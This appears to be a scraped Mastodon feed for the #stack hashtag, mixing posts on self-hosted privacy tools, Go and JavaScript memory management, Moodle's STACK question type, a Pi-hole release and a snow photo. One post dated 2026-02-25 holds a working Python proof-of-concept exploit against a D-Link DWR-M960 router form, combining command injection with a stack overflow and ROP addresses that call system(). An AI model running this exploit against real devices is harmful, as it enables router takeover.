#STACK

2026-03-07

My 2026 Privacy Stack: Big Tech Alternatives (Immich, Ollama & More)

youtube.com/watch?v=aGibWKd3KP…

lawrence.video/Related forum posthttps://forums.lawrencesystems.com/t/my-privacy-first-self-hosted-app-stack-2026/26575My Framework Laptophttps://you...


#privacy #tech #sovereignty #SelfHosted #app #stack #BigTech #alternatives

misryoum global news networkUs_Today
2026-03-06

OpenAI’s new Wall Street AI stack is coming for crypto next

misryoum.com/us/markets/openai

OpenAI’s latest financial-services tools plug ChatGPT into FactSet, Third Bridge, Excel, and Google Sheets, laying the groundwork for AI agents that can treat crypto as just another institutional asset class. Summary Tools let finance professionals pull data, run models,...

2026-03-04

[Перевод] Выделение памяти в Go

Эта статья посвящена языку программирования Go 1.24 , работающему на Linux на архитектуре ARM . Она может не охватывать специфические для других операционных систем (ОС) или аппаратных архитектур детали.

habr.com/ru/companies/timeweb/

#go #golang #memory_management #memory_allocation #stack #heap #timeweb_статьи_перевод #выделение_памяти #стек #куча

misryoum global news networkUs_Today
2026-03-02

Avio Smart Market Stack to acquire minority stake in Huwel Lifesciences

misryoum.com/us/markets/avio-s

Huwel’s Quantiplus MTB FAST platform enables testing at an approximate cost of ₹340 per sample, | Photo Credit: iStockphoto Avio Smart Market Stack (ASMS), formerly Bartronics India, has signed a share subscription cum shareholders’ agreement with Hyderabad-based Huwel Lifesciences.Under the...

Miss Kitty 🌈🌈🌈misskitty.art@bsky.brid.gy
2026-02-27

I did this, by the way I'm going through my #bookmark #stack right now. It's fucking enormous. We're going to be culling seriously. 😹😹😹 I'm going to add a #comment #directory below the #Albus directory on my #pin. It has a bunch more not directly Albus.

RE: https://bsky.app/profile/did:plc:hc7tndm7gduompba65aps75k/post/3mf5t4eypz22e

2026-02-25

time for some concatenative language

om-language.com/

2026-02-25

Память в JavaScript: Stack и Heap

Последние пару лет изменили то, как пишется код. Copilot, Cursor, ChatGPT, Claude - все это генерирует вполне работающий JavaScript быстрее, чем успеваешь сформулировать задачу. Это удобно. Но у этого удобства есть обратная сторона, сгенерированный код работает правильно в смысле делает что просили , но не всегда правильно в смысле не течет по памяти и не роняет прод под нагрузкой . Модели хорошо знают синтаксис и паттерны. Они значительно хуже разбираются в том, что происходит под капотом конкретного движка. Closure, захватывающий лишние данные. Event listener, который никогда не снимается. Объект, который непреднамеренно продлевает жизнь половине DOM дерева. Все это - настоящие ошибки, которые реально встречаются в проде и ни один линтер их не поймает. Чтобы замечать такие вещи при ревью, нужно понимать, как именно V8 хранит объекты и когда решает их удалить. Это не академическое знание - это инструмент, который меняет то, на что смотришь в коде. Эта серия состоит из трех частей. Первая - про то, как V8 вообще организует память, что такое Stack и Heap, чем они отличаются и что такое pointer. Вторая - про сборщик мусора, как он определяет, что живо, а что нет и как делает это, не останавливая программу надолго. Третья - практическое применение, откуда берутся утечки памяти, как их искать и как писать код, который не создает лишней работы для GC. Смотреть под капот

habr.com/ru/articles/1003702/

#v8 #javascript #память #garbage_collector_javascript #stack #heap #pointer #garbage_collector #nodejs #node

2026-02-25

and here is the POC, ugly, but working:
```
#! /usr/bin/python3

import requests
import sys

# just auth with a browsre and grab cookie
# the js code is awful, I'm too bored to reverse it
cookies = {"webuicookie":sys.argv[1]}
host="http://127.0.0.1" #adjust

# We need to browse /wlmultipleap.htm first
page1="/wlmultipleap.htm"
# otherwise form is not accessible
page2="/boafrm/formWlanMultipleAP"

r = requests.get(host+page1, cookies=cookies)
hdr={"Content-Type": "application/x-www-form-urlencoded"}

data="wlanIdx=wlanidx&wl_ssid1=wl_ssid&submit-url="
data = data+"%2f"+"aa;echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;"+"a"*209
data = data+"%e8%50%d5%3F" #system() @ in libc : 0x3fd25000+0x300E8 : s0 register
data = data+"aaaaaabaacaadaaeaafaagaahaaiaaja" #pad
data = data+"%1C%F4%D3%3F" #gadget@ move t9,s0; jalr t9, lw a0,64(sp)
data = data+"akaalaamaanaaoaapaaqaaraasaataauaavaawaaxaayaazabaabbabcabdabeab" #pad
data = data+"%C8%01%80%40" #stack addr 0x408001c8
data = data+"fabgabhabiabjabkablabmabnaboabpabqabrabsabtabuabvabwabxabyabzacaacbaccacdaceacfacgachaciacjackaclacmac.htm" #pad

r = requests.post(host+page2, cookies=cookies, headers=hdr, data=data)
```
In my poc, i wanted to do:
`echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;`
but the id applet is not compiled in the busybox :D :D

the output of cat /tmp/pwn showing "dlink dwr960 is pwned" text
European DIGITAL SME AllianceDIGITALSME
2026-02-24

🔎 Did you know that Europe relies on non-European providers for over 80% of its digital ? Yet, that dependency comes with risks.

The Tech Sovereignty Catalogue maps market-ready European solutions across cloud, connectivity, cybersecurity, AI and other technologies, making homegrown innovation visible and accessible to everyone.

Explore the Catalogue of solutions👇
techsov-catalogue.eu/catalogue/

Verfassungklage@troet.cafeVerfassungklage@troet.cafe
2026-02-23

#Pi_hole erhält #Update mit mehr Tempo und besserer Sicherheit - #fosstopia

Die Entwickler von #Pi_hole haben eine neue Version veröffentlicht. Der #Core #Stack steigt auf 6.4, das #Web #Interface auf 6.4.1 und #FTL auf 6.5. Nutzer von #Docker #Images greifen zur Ausgabe mit dem Tag 2026.02.0. Vor dem Update empfiehlt sich wie immer ein #Backup der eigenen Einstellungen. Der #Teleporter sollte dafür erste Anlaufstelle sein und erledigt das schnell und zuverlässig.

fosstopia.de/pihole-core-6-4/

2026-02-21

Kürzlich habe ich einen Artikel gelesen, in dem es um Fragen in einem Vorstellungsgespräch als Java-Entwickler ging. Es wurden einige Fragen vorgestellt und die These aufgestellt, dass die meisten Bewerber diese Fragen nicht beantworten können. Aus diesem Grund möchte ich ...

magicmarcy.de/java-interview-f

#Java-Interview #Grundlagen #JDK #JRE #abstrakte_Klasse #Interface #final #finally #finalise #stack #heap #private #protected #super #Garbage_Collector #GC

2026-02-20

AI Chat block customised for #STACK

I have created a video demonstrating the #Moodle AI Chat block from #ByCS with “agent mode”.

It adds “context” along with the user's question in the form of the strings in with the current form. In addition it can have page specific context. In the video I have added the context from

github.com/marcusgreen/moodle-

If you would like to experiment with this using a teacher account email me at

marcus.green@catalyst-eu.net
youtube.com/watch?v=VVW8m9lXTsk

#maths

AllInOneToolsallinonetools
2026-02-20

I shared the tech stack behind AllInOneTools on StackShare.

No complex infra.
Just fast, simple tools focused on doing one job well.

Sometimes boring tech builds the most useful things.

stackshare.io/allinonetools

ポイズン雷花poison_raika
2026-02-19

大地の唸り Гуркіт землі
大地の唸りが真夜中に響き
Гуркіт землі лунає серед ночі,

note.com/poison_raika/n/n08b5d

<>

2026-02-15

I spend a lot of time with the #Moodle #stack question type, which I describe as the most powerful and mature #maths related question type available for any platform.

stack-assessment.org/

However we are fortunate that there is another powerful #Mathematics question type called Formulas which, unlike STACK does not require an external service. This makes it easier to set up.

moodle.org/plugins/qtype_formu

#edtech #education #teaching #learning

Screenshot of the plugins page for the formulas question type which can be viewed at https://moodle.org/plugins/qtype_formulas
Patrick :neocat_flag_bi:patrick@hatoya.cafe
2026-02-08
Pontisto :vivaldi_red:pontisto@vivaldi.net
2026-02-05

[ Kapopomoj ]

Seĝo sur seĝo sur seĝo, la stako staras.

Dorsapogiloj kreas vicon da ripoostoj por skeleto kiu senspire atendas la finon de la vintro tiam la sunon denove ridetos sur ĉi tiun teraso.

~staplitaj vicoj~

\eZ

#miksang #dailypic #aphotoaday
#Esperanto #photography #photo
#winter #snow #frost #frozen
#knob #knobs #chairs #stack #stacks

[epo] Stakoj da terasaj seĝoj estas ekstere kovritaj de neĝo. La seĝoapogiloj havas ornamajn pomojn, kiuj klare viciĝas.

[eng] Stacks of terrace chairs are outside covered by snow. The chair rests have decorative knobs that distinctly line up.

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst